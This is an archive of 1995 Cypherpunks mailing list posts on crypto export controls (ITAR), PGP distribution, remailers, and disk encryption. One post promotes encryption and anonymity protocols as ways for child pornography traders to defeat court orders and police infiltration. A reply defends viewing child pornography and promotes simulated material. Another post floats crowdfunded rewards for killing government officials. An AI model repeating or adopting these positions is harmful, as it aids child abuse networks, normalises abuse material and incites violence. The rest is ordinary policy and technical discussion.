This protects the customer against stings, but it does not
protect the supplier against stings.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From gjeffers at socketis.net  Fri Nov 24 02:18:25 1995
From: gjeffers at socketis.net (Gary Jeffers)
Date: Fri, 24 Nov 1995 18:18:25 +0800
Subject: crypto for porno users
Message-ID: <199511241535.JAA30731@mail.socketis.net>


                   crypto for porno users

   Crypto porno is a wonderful topic for Cypherpunks. Child porno people
are a group that definitely needs the very best in computer security. If
their computer security problems are solved, then everybodys' computer
security problems are solved.

               COMPUTER SITE DISK SECURITY

   The SecureDrive 1.4 disk encryptor system solves their computer site
disk storage problem. It also gives them the solution to the "rubber hose"
problem. With a "damaged" key file and the use of a password, they have
an effective defense against court orders demanding keys. (see the docs
for SecureDrive 1.4). Also disk encryptors not only encrypt files but also
solve the problem of temporary work files that are used by many software
packages (They can be reconstructed).

                TELECOMMUNICATIONS SECURITY

   MIT's PGP 2.6.2 solves their problem of secure telecommunications.
This assumes that the people involved can really trust each other.


                 STATE INFILTRATOR PROBLEM

   Of course, one of the really big problems for non-STATE approved
groups is the problem of state agents infiltrating the group. This gets
worse as the group gets bigger. This is also one more thing I have against
states - one of their jobs is having their agents make friends with cit-
izens and then betray their friends. Has anyone else noticed? -  THE STATE
HAS NO HONOR! The state prides itself on its cleverness here.

   Also, of course, once the state has entrapped an individual, they tend
to get other members of the group by having their victims get and give
evidence against other members. - sort of a domino effect and the group
unravels - especially with the conspiracy laws. Drug distribution gangs
are famous for falling to these techniques.

   A possibly unbreakable defense against the above assault would be the
use of a Dining Cryptographers protocol. According to Applied Crypto-
graphy, PGP may be used to send messages in these protocols. Pretend that
a small group of Cypherpunks are child porn enthusiasts and decide to use
the Cypherpunk mailing list to exchange pictures and child porn info..

   I know little of the theory of Dining Cryptographers but I would think
that a good implementation of it would make infiltrators useless. I will
leave it for other Cypherpunks to discuss the mechanics (specific and
general) for actually doing this.

   A possible risk would be that this would put the general membership of
Cypherpunks at risk - or would it just put the list itself to risk? Does
this imply that we need FORTRESS mailing lists or what others would des-
cribe as COERCION-FREE mailing lists? Would remailers that allow two way
secure communication be a help here? Would they be forced to be FORTRESS
or COERCION-FREE to be effective?  Should they use expendable lists?:-)

   Generally, if you wanted to start a discussion group on a forbidden
topic on the Internet, and wanted to keep it secure - how would you do
it? Today this is an academic question - but tomorrow? :-) Aside from
workable anonymous Internet money, the two most needed computer privacy
technologies are fortress mailing lists and remailers and workable Dining
Cryptographers protocols.


THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American
without it.

                                           PUSH EM BACK! PUSH EM BACK!
                                           WWWAAAYYYY  BBBAAACCCCK!
                                           BBBEEEAAATTTT  STATE!

                                           Gary Jeffers







From jcobb at ahcbsd1.ovnet.com  Fri Nov 24 02:18:54 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Fri, 24 Nov 1995 18:18:54 +0800
Subject: Junk E-Mail - Part 4
Message-ID: <Pine.BSD.3.91.951123231858.12363F-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
In its NEWS IN BRIEF summary, 11 22 95 Financial Times 
reports: 
 
   BRUSSELS/LONDON - SELLING - A ban on telephone "cold 
   calling" throughout the European Union was on Tuesday 
   approved by Euro-MPs, to the consternation of direct mar- 
   keting and distance selling organisations.  In a move de- 
   signed to spare people from what MEPs consider to be ir- 
   ritating telephone calls, a key parliamentary committee 
   voted to make prior consent from consumers obligatory 
   before a seller can approach them by telephone. 
 
   The proposed ban also applies to communications by e- 
   mail, raising fears among publishing organisations that 
   the development of the information society in Europe could 
   be damaged. 
 
 
Ban fear, for we have nothing to fear but fear itself. 
 
 
Cordially, 
 
Jim 
 
  
 
NOTE.  The URL of one Financial Times Group website is: 
 
                   http://www.usa.ft.com 
 





From jamesd at echeque.com  Fri Nov 24 02:19:05 1995
From: jamesd at echeque.com (James A. Donald)
Date: Fri, 24 Nov 1995 18:19:05 +0800
Subject: Spam the Sign!
Message-ID: <199511240423.UAA25467@blob.best.net>


At 04:02 PM 11/22/95 -0800, Jeff Simmons wrote:

> and yet the people with the [balls]
> to actually challenge it aren't the big companies who stand to gain the
> most financially, it's a bunch of guys (a lot of whom hang around here
> sometimes) who are successfully giving away 'export controlled' software,

If you have looked at court cases recently, you will notice 
that most juries will find a corporation guilty of anything, 
no matter how absurd.  At a gut level they feel that the 
pursuit of profit is itself a crime, and that the pursuit 
of profit in an organized group is a flagrant and terrible 
crime, deserving of the most savage punishment, unless that 
pursuit has been thoroughly and carefully supervised and 
authorized by the state.


They are much more reluctant to punish an individual, which is why
the government wants to keep Phil in permanent legal limbo.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From EALLENSMITH at mbcl.rutgers.edu  Fri Nov 24 18:56:59 1995
From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH)
Date: Fri, 24 Nov 95 18:56:59 PST
Subject: crypto for porno users
Message-ID: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>


From: IN%"moroni at scranton.com"  "Moroni" 24-NOV-1995 14:52:11.13

>I wish we could get off the subject of the kiddie porn , it makes
>me wonder what people on this list are doing when they are not
>mailing out letters. Not to flame ,BUT it is such a serious issue
>and we all as adults and approaching adults should not treat it as
>an academic issue . It is the most victimizing of all crimes and
>I think of speak for some of us when I say that it would be better
>if we all found a way to get back to discussing the problems of
>cryptography as related to we not pornographers.

     I can see one argument that one should not discuss such
unpopular topics. That argument is that the person who brought them
up may act as a (hopefully inadvertent) _agent provocateur_ for
those who would condemn cryptography for protecting child
pornography and similarly unaccepted practices. However, I regard
self-censorship in reaction to fears of government as as evil as
governmental censorship. Consequently, I would like to give two
counterarguments to the idea that child pornography is not
something that should be cryptographically protected.
     The first is that one may legitimately disagree with the
government on what is child pornography. For instance, one may
disagree on what minimum age should be used. Governments are known
for being quite incoherent on rules on sexuality and the age of
consent. For instance, Britain's age for consent depends on the
type of sexuality involved; heterosexual sex receives a more
lenient age (18) than homosexual (21). (There are also, of course,
difficulties caused by such legal inconsistencies as simultaneously
deeming someone not to be of consenting age for sex yet to be
considered an adult when charged with murder; I refer to the
infamous Bobbit (sp?) trials).
     The second is that given new image modification technologies,
it is possible to produce what will seem child pornography, but
with no actual harm done to children. In some ways, this product
may reduce harm to children in some respects by providing a
"competing product" to actual child pornography, and thus
discourage its manufacture. Some will argue that such simulated
child pornography is useful by pedophiles in persuading children;
this argument appears similar to the one against cryptography that
it can be used for purposes generally agreed to be illegitimate. I
trust that the list does not find such an argument to be valid. I
will mention in this regard that I have no personal want to see
child pornography. However, I support the right of those who do to
do so, if no harm to others is committed.
     Sincerely Yours,
     -Allen





From s1113645 at tesla.cc.uottawa.ca  Fri Nov 24 07:58:32 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Fri, 24 Nov 1995 23:58:32 +0800
Subject: Spam the Sign!
In-Reply-To: <m0tInGT-0008xjC@pacifier.com>
Message-ID: <Pine.3.89.9511232304.A31942-0100000@tesla.cc.uottawa.ca>




On Thu, 23 Nov 1995, jim bell wrote:

> deal of fanfare, and tell him to "write some crypto."  He does, and brings
> it back into the US with him, leaving a copy of it "outside" the country for
> international distribution.
As long as the programmer's not American. They could contract it to a 
Canadian though. We don't have freeware export restrictions on non-US 
crypto, but I'm none too clear about everything else. All the same why not
contract it to Eric Young or whoever it is who's doing an independent
version of SSL (or whatever it's called) Down Under (was it Australia or 
NZ?) ? I don't see why geography's a problem.





From attila at primenet.com  Fri Nov 24 07:59:44 1995
From: attila at primenet.com (attila)
Date: Fri, 24 Nov 1995 23:59:44 +0800
Subject: "lack" of export control rules
In-Reply-To: <199511240523.VAA03642@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951124054104.12402A-100000@usr4.primenet.com>



On Thu, 23 Nov 1995, sameer wrote:

 a> The feds have never established a general policy.
 a> 

    in other words, business as usual with the Feds. If there is no "book"
on what is or is not legal v/v ITAR, and the agency responsible will not
communicate, it empirically says:  "...well, be reasonable to meet the
intent of the law, but we will not tell you what is really expected;
however, if, in the futute, we decide what we really want, we will bust
you if you did not fully comply despite your good intentions --and, if
that does not fly, we'll charge you with conspiracy...." 

    having been down the road a couple times including being charged with 
technology export for things which are essentially combinations of common 
knowledge, if nothing else works for the Feds, conspiracy will --and it 
carries the same penalties as the "crime" itself.  No small wonder the 
Europeans, including the British, laugh at our "legal" system.

 a> > if a solid (or reasonably accurate given the feds refusal
 a> > to put anything in writing) FAQ can be assembled, it would be worth
 a> > posting as a resource.
 a> >
 a> >     I had thought the feds were requiring that you at least verify the
 a> > address of the party requesting the code --at least as far as screening
 a> > out the obvious ones like .uk or .de and the like --which is far from
 a> > foolproof.  There has been mention someplace that they also expect some
 a> > screening by verifying numbers, not just names.
 a> >
 a> >     I guess the real question, just how much checking do they expect?
 a> > checking for country domains is easy enough, and the 'foolers' in 
 a> > .edu group can be listed, but there are plenty of other deceptions 
 a> > if you control the machine since communication inevitably works by 
 a> > the numbers which is a whole new ball of wax.
 a> >
 a> > On Tue, 21 Nov 1995, sameer wrote:
 a> >
 a> > > #!/bin/sh 
 a> > > umask 022
 a> > > DIRNAME=`cat $HOME/.usonlydir`
 a> > > NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
 a> > > cd /u1/ftp/pub/US-only
 a> > > mv I_will_not_export_$DIRNAME I_will_not_export_$NEWDIRNAME
 a> > > cd ..
 a> > > sed -e "s/$DIRNAME/$NEWDIRNAME/" < README.US-only > README.new
 a> > > mv README.new README.US-only
 a> > > echo $NEWDIRNAME > $HOME/.usonlydir
 a> >






From attila at primenet.com  Fri Nov 24 07:59:56 1995
From: attila at primenet.com (attila)
Date: Fri, 24 Nov 1995 23:59:56 +0800
Subject: real life problems with ITAR (was Spam the Sign!)
In-Reply-To: <m0tInGT-0008xjC@pacifier.com>
Message-ID: <Pine.BSD.3.91.951124073019.12402G-100000@usr4.primenet.com>



On Thu, 23 Nov 1995, jim bell wrote:

>  Jeff Simmons <jsimmons at goblin.punk.net> said...
>
	[SNIP] 

> >
> >I have the feeling that we're talking about two different things here - the
> >law as it's practiced in the courtroom and the law as it's practiced on the
> >'streets'.  Obviously, the fact that I feel I'm doing something 'legal'
> >won't help much if the government decides to do a Phil Zimmerman on me.
> >But I would be interested in your comments.
> 
   On Thu, 23 Nov 1995, jim bell wrote: 
 
> I very much agree with the direction you appear to be headed in.  It seems
> to me that Netscape should have no problem devising some sort of scenario in
> which such a program eventually gets onto the nets, but in a way that is
> squeaky clean, at least for THEM.  
> 
> 
> In addition, why should they even need to write the encrytion part of their
> software IN the US?  It occurs to me that one way to do this might be to
> send one of their programmers to a conveniently-located place, such as
> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
> deal of fanfare, and tell him to "write some crypto."  He does, and brings
> it back into the US with him, leaving a copy of it "outside" the country for
> international distribution.
> 
    <attila sez>  I think they have that one covered --not only is it 
violation of ITAR's intent to send a programmer out of the U.S., but is 
illegal to hire a foreign national to program for your non-U.S. products.
    the test is going to be with someone like Sun who "bought" a group of 
Russian crypto programmers and left them in Russia.  Now, the problem 
with ITAR is that if you import that code, you can not then export the 
code since it is now covered by ITAR.
    secondly, it appears there is a move afoot to make it an ITAR 
violation to hire the foreign nationals to circumvent ITAR --basically, 
the Feds want to stop cryptography _everywhere_, including telling 
Russians they can not work for U.S. companies!  Just where do they think 
they are getting off?

    then, when ALL hitech moves out of the U.S. and the DoD needs us, we 
will not be here, will we?  





From khijol!erc at uunet.uu.net  Fri Nov 24 08:02:42 1995
From: khijol!erc at uunet.uu.net (Ed Carp [khijol SysAdmin])
Date: Sat, 25 Nov 1995 00:02:42 +0800
Subject: establishing trust
In-Reply-To: <199511240500.AAA07836@clark.net>
Message-ID: <199511240708.BAA22051@khijol>


-----BEGIN PGP SIGNED MESSAGE-----

> >From khijol!erc at uunet.uu.net Thu Nov 23 16:21 EST 1995
> >From: "Ed Carp [khijol SysAdmin]" <khijol!erc at uunet.uu.net>
> 
> ..so..why the UUCP style address?

Because I don't have a real UUCP connection at the moment.  Khijol is 
expected to get back on the net as khijol.org in the next few days.  Just 
trying to get by until then :)

> >Subject: Re: crypto for porno users
> >To: khijol!clark.net!cme at uunet.uu.net (Carl Ellison)
> >Date: Thu, 23 Nov 1995 15:57:17 -0600 (CST)
> >Cc: khijol!got.net!edge at uunet.uu.net, khijol!toad.com!cypherpunks at uunet.uu.net
> >
> 
> >totally different from this "web of trust" I keep hearing about - and that is
> >*it*.  Do you trust me any more now than before I started signing my postings?
> 
> Actually, in my view, signed postings are the first step.  With those (and
> the right S/W (not there yet)), I get to know that a bunch of postings came
> from the same person.  I even know who they came from:  the person who
> is capable of signing with key 0xXXXXXXXX.

Yes, but that only establishes that I was the one who wrote the post, not 
that I am to be trusted...

> Since the only way I have of getting to know the person is through those
> postings, I get to know that person and through that knowledge I decide
> whether or not to trust.
> 
> And, yes, I can be fooled.

I've met a fair number of people in person that I've met over the net, and
I'm here to tell you that a lot of people I've met are totally different
in person than they are over the net.  People that I thought I could trust
gave me the willies in person, and I eventually found out that I couldn't
trust them at all.  Get burned a couple of times like that, and you learn
to suspend trust until you really meet someone in person. 

Just my $0.02.
- --
Ed Carp, N7EKG    			Ed.Carp at linux.org, ecarp at netcom.com
					214/993-3935	voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key		an88744 at anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLVvXCS9AwzY9LDxAQFO+wP+KYeRi9K/9AgXA7iyha61lsjZpYkDoSD1
kGaH04GGKcBhxPbVeRDnKaqM8oxesi24aKBWC7Hc0mJhB1+fsjZpwghd5/CzYAiK
WcZULWnVLKIqXWJlQuV/1UsEgHVa0mCEFbIUVoJtILQXoSRGIO7ga+6poYy5ag/r
g4Kgbf4M8GM=
=+Ee3
-----END PGP SIGNATURE-----





From jimbell at pacifier.com  Fri Nov 24 08:02:45 1995
From: jimbell at pacifier.com (jim bell)
Date: Sat, 25 Nov 1995 00:02:45 +0800
Subject: Spam the Sign!
Message-ID: <m0tIpka-000905C@pacifier.com>


>>  Jeff Simmons <jsimmons at goblin.punk.net> said...
>> 
>> >Then suppose you hand software to MIT to put on its export-controlled ftp
>> >site (which would seem to follow your requirements to take reasonable
>> >precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
>> >wink, wink - BUT you know that it's going to be available on major ftp
>> >sites in Europe within a few hours anyway.  The intent to export isn't 
>> >there, but the export occurs anyway.  Is it the intent, or the knowledge
>> >that's important?
>
>What's important to the government is that the crypto not be exported. 


Actually, that's not true.  What's REALLY important to the government is
that it not be AVAILABLE outside the country, or perhaps even more
accurately, not available anywhere.  Problem is, the government doesn't have
unlimited authority in this area.


>> >Or, to bring it down to a practical question, what's stopping Netscape?  How
>> >does Netscape setting up an 'export controlled' ftp site based on the MIT
>> >version lead to one of their executives going to jail?
>
>Maybe their executives don't want to deal with the possibility of going to
>jail and are staying far from the edge of the law.  Maybe they are too busy
>trying to find some way to make money.
>
>> I very much agree with the direction you appear to be headed in.  It seems
>> to me that Netscape should have no problem devising some sort of scenario in
>> which such a program eventually gets onto the nets, but in a way that is
>> squeaky clean, at least for THEM.  
>
>But why would they want to risk this? As squeeky clean as it is, we now
>all know that they know that making it available this way is exporting
>it. 

NO!  The government doesn't even pretend to have authority over non-exported
encryption, and they readily admit this.    And I'm sure they are also are
aware that they can't press their luck with an overbroad interpretation of ITAR.

Let's look at REALITY, okay?  Export controls on products have been around
for many decades.  Computers are a classic example.  If merely manufacturing
a product that (if exported to the wrong place) becomes a violation of such
laws/regulations, then practically every computer company that has ever
existed violated ITAR.

Here's the real "problem": Export regulations were intended to MINIMIZE the
number of controlled products "leaking through" the border.  There was never
any illusion that this could be entirely eliminated. So far so good: They
were happy to minimize the number of mainframe computers 1970 (for example)
USSR got.

Software, by its very nature, is infinitely copiable, which means that even
a single export  constitutes a complete failure of the system.  Thus, a
system of regulation that was useful for hardware becomes totally useless
for software.

 
>> In addition, why should they even need to write the encrytion part of their
>> software IN the US?  It occurs to me that one way to do this might be to
>> send one of their programmers to a conveniently-located place, such as
>> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
>> deal of fanfare, and tell him to "write some crypto."  He does, and brings
>> it back into the US with him, leaving a copy of it "outside" the country for
>> international distribution.
>
>This is illegal as well. 

No, it isn't.

>The programmer is exporting the cryptosystem,

No, he isn't.  Exporting a book on encryption, including algorithms, for
example, is entirely LEGAL.  

And I think you're misusing the term, "cryptosystem."  The government may be
attempting to use ITAR to regulate exports of fully-functioning software,
but it apparently cannot touch books containing source code for such
programming.  Thus, "exporting the cryptosystem" is NOT always a violation
of ITAR if your definition of "cryptosystem" is so broad as to include
source-on-paper, and thus your statement is legally irrelevant.  If you
tighten up the term "cryptosystem" to  include only functioning software,
your statement becomes false because said programmer does not need to export
same.

Note that I'm assuming that the programmer GENUINELY writes the software
abroad, as opposed to faking it.   Of course, even "faking it" might be
legal:  If source-on-paper exporting is LEGAL, then taking a copy of an
encryption program outside the country on paper, then scanning it into a
computer and recompiling there should also be legal. 

>and may even be guilty of treason (probably not).  If you really want
>strong crypto, just buy it fom one of the hundreds of legitimate
>overseas suppliers.  If you want to export strong crypto Netscape,
>rewrite Netscape outside the US.  It's not that complex a program.

That's not a satisfactory solution.  The goal, I suggest, is to allow
Netscape (or any other manufacturer) to sell a SINGLE product around the
world, without violating (even arguably) ITAR.  






From jya at pipeline.com  Fri Nov 24 08:14:46 1995
From: jya at pipeline.com (John Young)
Date: Sat, 25 Nov 1995 00:14:46 +0800
Subject: CJR_war
Message-ID: <199511241605.LAA19328@pipe3.nyc.pipeline.com>


   SciAm, December, 1995:


   "Fighting Future Wars. U.S. military planners may be
   preparing for the wrong conflict."

      Policy experts, technical gurus and defense contractors
      have begun to study a range of other potential threats,
      from a newly hatched superpower to a regional power with
      dramatically altered fighting tactics, to legions of
      mercenary hackers that bring down banks and stock
      exchanges with computer viruses and other malevolent
      software. The vast array of scenarios is a measure of
      the speculative turn that has gripped the
      military-planning establishment.

      Debate on high-tech fighting culminates in the question
      of whether information technologies -- a computer virus,
      for one -- could make conventional military hardware
      obsolete and whether they would make possible a virtual
      invasion of the continental U.S. A battle of the bits
      would be fought by destroying an enemy's information
      assets, its financial, electrical, telecommunications
      and air-traffic-control networks. Direct strikes at the
      military would not be ruled out: cracking a government
      computer is already a not infrequent hacker rite of
      passage. In addition, more than 95 percent of military
      communications travel over public networks.


   CJR_war














From jya at pipeline.com  Fri Nov 24 08:16:45 1995
From: jya at pipeline.com (John Young)
Date: Sat, 25 Nov 1995 00:16:45 +0800
Subject: SEL_ane
Message-ID: <199511241607.LAA19557@pipe3.nyc.pipeline.com>


   As previously noted here: SciAm, December, 1995:


   "Confidential Communication on the Internet." By Thomas
   Beth, director of the European Institute for System
   Security and professor of computer science at the
   university of Karlsruhe.

      Chain of certification in the author's scheme, SELANE,
      extends from local authorities who vouch for an
      individual's identity and probity up through regional,
      national and supranational authorities, each vouching
      for those below it. Digital signatures prevent
      tampering; anyone who recognizes one signature in the
      chain can be assured that a signed document is valid.

      SELANE is compatible with almost every commercial and
      academic network. It also provides a "smart" card that
      can carry out the necessary calculations securely for
      each user. And it addresses the conflicts of government
      and privacy interests when wire-tapping is needed.


   SEL_ane









From saken at chardos.connix.com  Fri Nov 24 09:05:38 1995
From: saken at chardos.connix.com (Scott Kenney)
Date: Sat, 25 Nov 1995 01:05:38 +0800
Subject: ANNOUNCE - Amnesia Remailer now public
Message-ID: <199511241656.LAA05960@chardos.connix.com>

A non-text attachment was scrubbed...
Name: not available
Type: application/pgp
Size: 14 bytes
Desc: not available
URL: <https://lists.cpunks.org/pipermail/cypherpunks-legacy/attachments/19951125/6bcfe90f/attachment.bin>

From jimbell at pacifier.com  Fri Nov 24 09:41:00 1995
From: jimbell at pacifier.com (jim bell)
Date: Sat, 25 Nov 1995 01:41:00 +0800
Subject: real life problems with ITAR (was Spam the Sign!)
Message-ID: <m0tJ1o2-0008zJC@pacifier.com>



Attila at primenet.com said:

>   On Thu, 23 Nov 1995, jim bell wrote: 
> 
>> I very much agree with the direction you appear to be headed in.  It seems
>> to me that Netscape should have no problem devising some sort of scenario in
>> which such a program eventually gets onto the nets, but in a way that is
>> squeaky clean, at least for THEM.  
>> 
>> 
>> In addition, why should they even need to write the encrytion part of their
>> software IN the US?  It occurs to me that one way to do this might be to
>> send one of their programmers to a conveniently-located place, such as
>> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
>> deal of fanfare, and tell him to "write some crypto."  He does, and brings
>> it back into the US with him, leaving a copy of it "outside" the country for
>> international distribution.
>> 
>    <attila sez>  I think they have that one covered --not only is it 
>violation of ITAR's intent to send a programmer out of the U.S.

Well, don't assume that because something's a "violation of ITAR's INTENT"
it is actually a violation of ITAR.    It can't be assumed that ITAR is
_perfect_:  That it actually prohibits every activity the government that
wrote it didn't like.

, but is 
>illegal to hire a foreign national to program for your non-U.S. products.

Sure about this?!?

>    the test is going to be with someone like Sun who "bought" a group of 
>Russian crypto programmers and left them in Russia.  Now, the problem 
>with ITAR is that if you import that code, you can not then export the 
>code since it is now covered by ITAR.

I didn't say that the code would ever be "re-exported":  A copy would be
brought into the US for domestic use, and everyone else outside the border
would get their own copy from an outside server. 


>    secondly, it appears there is a move afoot to make it an ITAR 
>violation to hire the foreign nationals to circumvent ITAR --basically, 
>the Feds want to stop cryptography _everywhere_, including telling 
>Russians they can not work for U.S. companies!  Just where do they think 
>they are getting off?

It is for this kind of problem that I "invented" my concept of
"Assassination Politics":  If everybody pissed off at this situation was
willing to donate $10 to a fund to reward the deaths of a few government
officials responsible for ITAR, I can well imagine that this would shake
them up a bit.  






From iagoldbe at calum.csclub.uwaterloo.ca  Fri Nov 24 10:28:44 1995
From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Sat, 25 Nov 1995 02:28:44 +0800
Subject: real life problems with ITAR (was Spam the Sign!)
In-Reply-To: <604.9511240945@exe.dcs.exeter.ac.uk>
Message-ID: <4952bt$595@calum.csclub.uwaterloo.ca>


In article <604.9511240945 at exe.dcs.exeter.ac.uk>,  <aba at atlas.ex.ac.uk> wrote:
>Something that is puzzling me is how DigiCash is doing.  Their
>software I think is ITAR regulated (or would be if it were shipped
>from a US ftp site).  OK, so they get around it by shipping their
>software from Digicash, Bv, Netherlands.
>
>But, somewhere on their pages it mentions that: "Digicash, Bv is a
>wholly owned subsidiary of Digicash" (which *is* based in the US).
>
>Does that make them a counter example who is currently getting away
>with it?  Just to complicate things further David Chaum is a US
>citizen, right?  Maybe he himself is ok because he doesn't write the
>code himself, the digicash development team does.  Is Digicash (US)
>hiring (collectively) Digicash, Bv if it is a wholly owned subsidiary,
>in US legal terms?

<IANAL>
Even if DigiCash gave a <exon> about ITAR and the NSA, ecash probably
wouldn't be covered anyway, because the ITAR has a specific exception
for encrypting financial data (that's so you can use your credit and bank
cards overseas).
</IANAL>

   - Ian "What's with this day-after-thanksgiving, anyway...?"





From moroni at scranton.com  Fri Nov 24 11:26:43 1995
From: moroni at scranton.com (Moroni)
Date: Sat, 25 Nov 1995 03:26:43 +0800
Subject: Virus attacks on PGP
In-Reply-To: <Pine.SUN.3.90.951120144320.25327E-100000@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.951124150849.7425A-100000@prufrocks.scranton.com>



    Where can one get PGP burnt into cdrom? Or the equiptment to do it
             Thanks in advance
                 moroni






From EALLENSMITH at ocelot.Rutgers.EDU  Fri Nov 24 11:49:41 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Sat, 25 Nov 1995 03:49:41 +0800
Subject: crypto for porno users
Message-ID: <01HY0WLMKRLG8WYLO9@mbcl.rutgers.edu>


From: gjeffers at socketis.net (Gary Jeffers)

   The SecureDrive 1.4 disk encryptor system solves their computer site
disk storage problem. It also gives them the solution to the "rubber hose"
problem. With a "damaged" key file and the use of a password, they have
an effective defense against court orders demanding keys. (see the docs
for SecureDrive 1.4). Also disk encryptors not only encrypt files but also
solve the problem of temporary work files that are used by many software
packages (They can be reconstructed).
-----------------------
	Does anyone know of any strong encryptor systems that encrypt a
MS-DOS directory with subdirectories, as opposed to a partition? Aside from
convenience, this does have the potential advantage that if you did some FAT,
etcetera manipulation, it wouldn't be possible to figure out what was garbage
and what was encrypted without the program running properly (i.e., have an
emergency hotkey combination that wiped the currently used password/phrase and
removed the program and the alterations to the FAT).
	Also nice would be working off of a key on a 3.5" floppy, so it can
be removed when not in use (thus reducing the need for typing in a
password/phrase every few minutes). It should be compatible with Stacker and
similar compression systems if possible, although it could also be run on the
uncompressed drive- that way it'd take up more space, however.
	-Allen





From Piete.Brooks at cl.cam.ac.uk  Fri Nov 24 12:03:32 1995
From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks)
Date: Sat, 25 Nov 1995 04:03:32 +0800
Subject: Virus attacks on PGP
In-Reply-To: <Pine.LNX.3.91.951124150849.7425A-100000@prufrocks.scranton.com>
Message-ID: <"swan.cl.cam.:180670:951124195035"@cl.cam.ac.uk>


> Where can one get PGP burnt into cdrom? Or the equiptment to do it

If you can wait a while, TERENA (UKERNA, SURFnet, etc) are producing a PGP CD
at the start of next year ...





From froomkin at law.miami.edu  Fri Nov 24 12:36:09 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Sat, 25 Nov 1995 04:36:09 +0800
Subject: Sun rumor [WAS Re: real life problems with ITAR (was Spam the Sign!)]
In-Reply-To: <Pine.BSD.3.91.951124073019.12402G-100000@usr4.primenet.com>
Message-ID: <Pine.SUN.3.91.951124152336.28283G-100000@viper.law.miami.edu>


On Fri, 24 Nov 1995, attila wrote: [....]
>     the test is going to be with someone like Sun who "bought" a group of 
> Russian crypto programmers and left them in Russia.  Now, the problem 
> with ITAR is that if you import that code, you can not then export the 
> code since it is now covered by ITAR.
[....]

I've heard this story several times from many different people.  Anyone
have any evidence that it's true? (My friends at Sun say they haven't
heard the story, but don't work in the parts that would have necessarily
heard it.)

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From master at internexus.net  Fri Nov 24 12:39:43 1995
From: master at internexus.net (Laszlo Vecsey)
Date: Sat, 25 Nov 1995 04:39:43 +0800
Subject: Virus attacks on PGP
In-Reply-To: <"swan.cl.cam.:180670:951124195035"@cl.cam.ac.uk>
Message-ID: <Pine.LNX.3.91.951124152257.5757A-100000@micro.internexus.net>


> > Where can one get PGP burnt into cdrom? Or the equiptment to do it
> 
> If you can wait a while, TERENA (UKERNA, SURFnet, etc) are producing a PGP CD
> at the start of next year ...

Would PGP on CD-ROM truely gaurantee a corrupt/virus free executable? A 
virus already running in memory could tamper with what it's doing, 
perhaps extracting the necessary keys and dumping them to a log file.
This would be especially dangerous on a UNIX system where many people 
might be using PGP, thinking it is secure.

I think the only way to be safe is to actually boot up off of the CD-ROM, 
and hope that the hardware in your computer physically hasn't been 
tampered with :)





From ses at tipper.oit.unc.edu  Fri Nov 24 13:47:24 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Sat, 25 Nov 1995 05:47:24 +0800
Subject: Sun rumor [WAS Re: real life problems with ITAR (was Spam the Sign!)]
In-Reply-To: <Pine.SUN.3.91.951124152336.28283G-100000@viper.law.miami.edu>
Message-ID: <Pine.SOL.3.91.951124133617.25364A-100000@chivalry>


On Fri, 24 Nov 1995, Michael Froomkin wrote:
> 
> I've heard this story several times from many different people.  Anyone
> have any evidence that it's true? (My friends at Sun say they haven't
> heard the story, but don't work in the parts that would have necessarily
> heard it.)

It sounds like something I heard from John Gage, though the rumors may be 
getting conflated with Suns purchace of the entire Soviet super-computer 
industry in (I think) '92. 






From mch at squirrel.com  Fri Nov 24 13:57:36 1995
From: mch at squirrel.com (Mark C. Henderson)
Date: Sat, 25 Nov 1995 05:57:36 +0800
Subject: PGP in Canada
In-Reply-To: <Pine.OSF.3.91.951123073901.6893B-100000@nic.wat.hookup.net>
Message-ID: <9511241348.ZM19179@squirrel.com>


On Nov 23,  7:41, Tim Philp wrote:
> Subject: Re: PGP in Canada
> You can try to get PGP from the MIT site but it may not allow you to do
> so if it does not recognize your address as being Canadian.

You can also get pgp from a Canadian site.

Get the file

ftp://ftp.wimsey.com/pub/crypto/software/README

for instructions and conditions (export restrictions).

-- 
Mark Henderson -- markh at wimsey.bc.ca, henderso at netcom.com, mch at squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.5.1.tar.gz





From zeus at pinsight.com  Fri Nov 24 14:36:09 1995
From: zeus at pinsight.com (J. Kent Hastings)
Date: Sat, 25 Nov 1995 06:36:09 +0800
Subject: Fwd: Re: using ecash
Message-ID: <199511242334.PAA03668@chico.pinsight.com>


